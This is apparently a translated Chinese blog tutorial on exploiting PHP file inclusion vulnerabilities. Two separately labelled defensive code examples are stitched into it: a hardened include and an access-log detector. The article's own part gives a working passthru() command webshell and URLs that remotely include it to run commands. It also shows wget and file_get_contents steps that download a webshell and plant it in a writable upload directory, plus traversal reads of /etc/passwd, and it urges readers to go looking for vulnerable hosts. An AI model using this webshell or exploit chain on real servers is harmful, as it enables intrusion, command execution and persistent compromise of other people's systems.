PHP remote include file vulnerability analysis

  • 2020-03-31 16:46:06
  • OfStack

Almost all CGI-style web programs can have this kind of bug; only the way it shows up differs from program to program.

One, include(), require() and include_once(), require_once()

include() and require(): include and run the specified file.

The two constructs are identical except in how they handle failure: include() produces a warning, while require() causes a fatal error. In other words, if you want processing of the page to stop when a file is missing, use require(); include() does not stop, and the script continues to run.
If allow_url_fopen is enabled in PHP (the default configuration), the file to be included can also be specified as a URL (via HTTP or another supported wrapper) instead of a local file. If the target server interprets the target file as PHP code, you can pass variables to the included file using the query string of an HTTP GET request.
Detailed reference: http://cn.php.net/manual/en/function.include.php

require_once() and include_once()
The require_once() and include_once() statements include and run the specified file during execution of the script. This behaves like require() and include(), except that if the code from that file has already been included, it is not included again. Where the same file might be included more than once during a script's execution, this makes sure it is included only once and avoids problems such as function redefinition and variable reassignment.
Detailed reference: http://cn.php.net/manual/en/function.require-once.php

Two, why files are included

Programmers do not like doing the same thing twice, or writing the same code (for example some common functions) several times in one program, so they put the shared code into a separate file, say share.php, and include it from the other files. In PHP the functions listed above are used for this. The process is: if main.php needs share.php, write include("share.php") in main.php, and the functions from share.php can then be used. When the file name to include is hard-coded like this there is no problem at all, so where exactly does the problem come from?
Sometimes you cannot know in advance which file to include, as in the following file, index.php:

<?php
if (!empty($_GET['page'])) {
    include $_GET['page'];   // the file name comes straight from the URL, unfiltered
} else {
    include "home.php";
}
?>

This is an ordinary piece of PHP code; how does it work? I will not explain the meaning of $_GET here (that would be a separate article about HTTP); if you are not familiar with GET, POST and so on, you will need to look them up first.
Code in this form is used with URLs such as http://www.jb51.net/php/index.php?page=main.php or http://www.jb51.net/php/index.php?page=downloads.php. Combined with the code above, this is briefly how it works:
1. Submit the URL above; index.php receives the value of the page parameter ($_GET['page']).
2. Check whether $_GET['page'] is empty. If it is not (here, main.php), include that file with include().
3. If $_GET['page'] is empty, execute the else branch and include the home.php file.
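A hardened replacement for the index.php pattern above, written as an added example (not code from the article). It combines an allowlist of page names with a real-path confinement check, and refuses to serve dynamic includes while the interpreter would fetch URLs at all. The ./pages/ layout, the allowlist contents and the PHP 7.1+ requirement are assumptions of this example.

```php
<?php
// Hardened replacement for "include $_GET['page']" (added example, not the article's code).
// Two checks are combined: an allowlist of page names, and a real-path check that the
// resolved file stays inside the pages directory, so "../../etc/passwd", "/etc/passwd"
// and "http://host/cmd.txt" are all refused before include() ever sees them.
// Assumed layout (hypothetical): every includable page lives under ./pages/<name>.php.

define('PAGES_DIR', __DIR__ . '/pages');
$allowed_pages = ['home', 'main', 'downloads'];   // allowlist of known page names (assumed)

// Returns the absolute path to include, or null if the request must be refused.
function resolve_page(?string $page, array $allowed): ?string
{
    if ($page === null || $page === '') {
        $page = 'home';                           // default, like the else branch above
    }
    // Accept a bare name only: no slashes, dots or ':' (so neither "../" nor "http://").
    if (!preg_match('/^[A-Za-z0-9_-]{1,32}$/', $page) || !in_array($page, $allowed, true)) {
        return null;
    }
    $base = realpath(PAGES_DIR);
    $path = realpath(PAGES_DIR . '/' . $page . '.php');
    // realpath() returns false for a missing file and collapses "..", so anything that
    // does not start with the base directory escaped it (defence in depth: the regex
    // and the allowlist already rule this out).
    if ($base === false || $path === false || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

// Refuse to serve dynamic includes at all while the interpreter would fetch URLs.
// Since PHP 5.2, including a URL needs allow_url_include (Off by default) in addition
// to the allow_url_fopen setting the article refers to, which on its own only enables
// fopen()-style URL reads.
if (filter_var(ini_get('allow_url_include'), FILTER_VALIDATE_BOOLEAN)) {
    http_response_code(500);
    exit('allow_url_include is enabled; refusing to serve dynamic includes');
}

$target = resolve_page($_GET['page'] ?? null, $allowed_pages);
if ($target === null) {
    http_response_code(404);
    exit('Unknown page');
}
include $target;
```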

Three, why there is a vulnerability

You might say: great, files can be included dynamically through the URL, how convenient; where is the bug? The answer is that we are not well-behaved visitors. Unlike other people, we do not follow the links the author provides; we may want to write our own file name to include (call), for example by entering the URL http://www.jb51.net/php/index.php?page=hello.php. Our index.php then dutifully follows the steps above: it takes page as hello.php and calls include("hello.php"), and now the problem appears. Since there is no file hello.php, the include emits warnings like the following:

Quote:
Warning: include(hello.php) [function.include]: failed to open stream: No such file or directory in /vhost/php/index.php on line 3
Warning: include() [function.include]: Failed opening 'hello.php' for inclusion (include_path='.:') in /vhost/php/index.php on line 3

Note that the first warning simply says the hello.php file we specified could not be found, that is, the file at the given path; the second warning is then issued by include() because the specified file was not found.

Four, how it is exploited

As shown above, there is a problem; so how can such a hole be exploited? There are many ways, but in essence they are all the same. Here are three common ones:

1. Including other files on the target to read them

As we saw, the page parameter is used without any filtering, so we can specify other sensitive files on the target host. The warning above, for example, already exposes the absolute path (/vhost/php/), so with some probing we can include other files. A URL such as http://www.jb51.net/php/index.php?page=./txt.txt reads txt.txt in the current directory; ../../ can also be used to move up the directory tree (when ../ is not filtered); and an absolute path to a sensitive system file can be given directly, for example http://www.jb51.net/php/index.php?page=/etc/passwd. This file can be read if the target host is not very restrictive or Apache was started with high privileges; otherwise you get a warning along the lines of: open_basedir restriction in effect.

2. Including a runnable PHP trojan

If allow_url_fopen is enabled on the target host (it is enabled by default and few people change it), we have much more room: we can point the include at a webshell containing PHP code on some other URL and have it run directly. For example, here is a piece of PHP that runs commands (commented, so it should be easy to follow); save it as cmd.txt (the extension does not matter, as long as the content is PHP):
CODE:
--------------------------------------------------------------------------------

<?php
if (get_magic_quotes_gpc()) {
    $_REQUEST["cmd"] = stripslashes($_REQUEST["cmd"]); // remove the escaping backslashes added by magic quotes
}
ini_set("max_execution_time", 0); // execution time limit for this file; 0 means unlimited
echo "\n1.S.T\n";                 // print the start marker
passthru($_REQUEST["cmd"]);       // run the command given in cmd
echo "\n1.S.T\n";                 // print the end marker
?>
The file above accepts the command given in cmd and calls passthru() to execute it, returning the output between the 1.S.T markers. Save this file on a host of ours that does not execute PHP (so the source is served as-is) where it can be fetched over HTTP, for example http://www.jb51.net/cmd.txt; then construct the following URL against the vulnerable host: http://www.jb51.net/php/index.php?page=http://www.jb51.net/cmd.txt?cmd=ls, where cmd is the command to execute. Other commonly used commands (taking *UNIX as an example):

Quote:
ll lists directories and files (the equivalent of dir under Windows)
pwd shows the current absolute path
id / whoami show the current user
wget downloads the file at the specified URL

And so on; look the others up for your platform on Baidu, they are not listed here.
The method above gives us a webshell (the PHP file is not on the target, but it is still a webshell, isn't it? Ha ha)
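Detection logic for the requests described in methods 1 and 2 above, as an added example that is not part of the article: a CLI PHP script that parses combined-format access-log lines and flags include-style parameters carrying directory traversal, an absolute path or a remote URL. The log lines are constructed for this example and the parameter names checked (page, file, include) are assumptions.

```php
<?php
// Added detection example (not from the article): flag access-log requests whose
// include-style parameter carries traversal, an absolute path or a remote URL.
// Classify one parameter value; returns a label, or null when it looks benign.
function classify_include_value(string $value): ?string
{
    $v = rawurldecode($value);                         // catch double-encoded ../ (%252e%252e)
    if (preg_match('#^[a-z][a-z0-9+.-]*://#i', $v)) return 'remote-include';
    if (strpos($v, '..') !== false)                    return 'traversal';
    if ($v !== '' && $v[0] === '/')                    return 'absolute-path';
    return null;
}

// Parse a combined-format access log line into client, method, path and status.
function parse_log_line(string $line): ?array
{
    if (!preg_match('/^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})/', $line, $m)) {
        return null;
    }
    return ['client' => $m[1], 'method' => $m[2], 'path' => $m[3], 'status' => (int)$m[4]];
}

// Run the classifier over the named parameters of every line; returns the findings.
function scan_log(array $lines, array $params): array
{
    $findings = [];
    foreach ($lines as $line) {
        $req = parse_log_line($line);
        if ($req === null || ($q = strpos($req['path'], '?')) === false) continue;
        // Split on the first '?' ourselves: a remote URL value may carry its own '?cmd=...'
        // (the chaining trick shown above) and that part must stay inside the value.
        parse_str(substr($req['path'], $q + 1), $args);
        foreach ($params as $p) {
            if (isset($args[$p]) && is_string($args[$p])
                && ($label = classify_include_value($args[$p])) !== null) {
                $findings[] = ['client' => $req['client'], 'param' => $p, 'value' => $args[$p], 'label' => $label];
            }
        }
    }
    return $findings;
}

// Constructed sample lines mirroring the requests discussed in this section.
$sample = [
    '203.0.113.5 - - [31/Mar/2020:16:46:06 +0000] "GET /php/index.php?page=main.php HTTP/1.1" 200 512',
    '203.0.113.5 - - [31/Mar/2020:16:46:10 +0000] "GET /php/index.php?page=../../etc/passwd HTTP/1.1" 200 1024',
    '203.0.113.5 - - [31/Mar/2020:16:46:15 +0000] "GET /php/index.php?page=http://example.com/cmd.txt?cmd=ls HTTP/1.1" 200 2048',
];
foreach (scan_log($sample, ['page', 'file', 'include']) as $f) {   // parameter names assumed
    printf("%s %s=%s [%s]\n", $f['client'], $f['param'], $f['value'], $f['label']);
}
```

Only the second and third constructed lines are reported (traversal and remote-include); the first, with page=main.php, is left alone.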

3. Including a PHP file that creates a file

Some people may feel it is safer to get a real webshell onto the target machine: if someone finds the inclusion bug and patches it, the "fake" webshell obtained through remote inclusion is gone, right? That mentality is understandable. Let us go on. To get a real webshell there are again two common methods:

1) use a command such as wget to download a webshell

This is simple and very common. With the pseudo-webshell obtained above we can execute commands, so we can also call wget, a very useful system tool. You can Google this command; it has a great many options, enough to confuse anyone, ha ha, but we do not need anything so complicated. We only use -O (--output-document=FILE, write the document to FILE), hehe.
The precondition is that, as in the previous steps, you have placed a PHP webshell somewhere reachable over HTTP or FTP, for example http://www.jb51.net/1stphp.txt, with the webshell written into that file. Then, through the pseudo-webshell obtained earlier, we run a URL such as http://www.jb51.net/php/index.php?page=http://www.jb51.net/cmd.txt?cmd=wget http://www.jb51.net/1stphp.txt -O 1stphp.php. If the current directory is writable, this gives a webshell named 1stphp.php; if the current directory is not writable, there are other ways.

2) create the file with PHP

The wget approach may run into a current directory that cannot be written to, or the target host may have disabled (or never installed) that command, so we need to be flexible: we can combine the include vulnerability with a PHP script that creates (writes) a file, as follows:
CODE:
--------------------------------------------------------------------------------

<?php
$f = file_get_contents("http://www.jb51.net/1stphp.txt"); // read the contents of the file at the specified URL
$ff = fopen("./upload/1st.php", "a");                      // pick a likely writable directory and create the file
fwrite($ff, $f);                                           // write the contents read above into the created file
fclose($ff);                                               // close and save the file
?>
This is still the same PHP file we downloaded above with wget, only the method has been improved to use a PHP script. So with cmd.php?cmd=ll above you find a directory you can write to, such as upload here, and create the file in that directory: ./upload/1st.php. That gives us our webshell.

Five, closing words

This sub-topic can actually end here; a few last words. File inclusion is basically a fairly simple vulnerability with a high risk factor, and it still exists in many systems; with a little care you can find plenty of instances. The exploitation process is quite flexible, so be good at analyzing the problem and finding a solution, and you will make steady progress.
The vulnerability touches a lot of knowledge that cannot all be covered one by one; where the explanation is unclear, feel free to ask questions or turn to Google. Time is short and the description may not be accurate everywhere, so corrections are welcome!
Finally, this kind of thing needs practice. When I have time I will walk through a concrete example so that we get a deeper understanding; you can also start looking now, and if you find a vulnerability I hope you will share your detailed analysis and exploitation process here! May you make progress.
